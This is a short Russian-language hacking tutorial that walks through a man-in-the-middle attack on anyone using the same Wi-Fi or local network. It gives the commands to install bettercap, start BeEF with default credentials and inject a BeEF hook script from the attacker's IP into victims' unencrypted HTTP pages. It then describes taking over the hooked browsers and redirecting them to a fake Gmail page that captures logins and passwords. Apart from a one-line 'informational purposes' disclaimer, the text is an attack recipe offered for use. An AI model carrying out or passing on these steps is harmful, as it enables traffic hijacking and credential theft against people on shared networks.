Взлом любых устройств в сети
- Данная статья создана исключительно в ознакомительных целях и не призывает к действиям!
Нам понадобится:
-Kali Linux
-beef-xss framework
-bettercap
- Установим bettercap на Kali Linux:
apt install build-essential ruby-dev libpcap-dev net-tools gem install bettercap
- Beef в Kali уже установлен. Запускаем beef(Логин: beef, пароль: beef):
service beef-xss start
- Если проблемы с авторизацией, запускаем из папки:
cd /usr/share/beef ./beef
- Подключаемся к любой вай-фай сети (В локалке работает тоже)
- Запускаем bettercap:
bettercap --proxy --proxy-module injects --js-url "http://192.168.57.128:3000/hook.js"
- Указываем ваш ip (Почему не локалхост думаю понятно)
Тут происходит инжект скрипта beef‘а. Снифаем траффик, подстраиваемся под запрос, встраиваем скрипт и отправляем обратно тому, кто сделал запрос.
Работает, если человек зашел на страницу без ssl, т.е по протоколу http. Как только он закроет страницу- связь с ним пропадает.
Все браузеры-зомби, которые подцепил beef отобразятся в меню слева.
Пока они онлайн, можно использовать различные модули и экплоиты на них.
Beef содержит множество модулей. Вам остается только подобрать нужные для ваших векторов атак.
Все зависит от браузера и то в каких контекстах безопасности он находится. Каждый контекст может обеспечивать набор уникальных векторов атак.
Например, можно направить пользователя на фейк gmail. Выбираем нужный модуль, жмем execute. У пользователя-зомби произойдет редирект на фейк. Если он введет свой логин и пароль, то они отобразятся у нас в панели.